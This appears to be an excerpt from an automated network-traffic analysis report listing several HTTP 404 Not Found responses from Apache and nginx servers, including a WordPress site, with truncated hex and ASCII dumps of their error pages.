            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:27:34 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 
32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:50 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:55 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:07 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
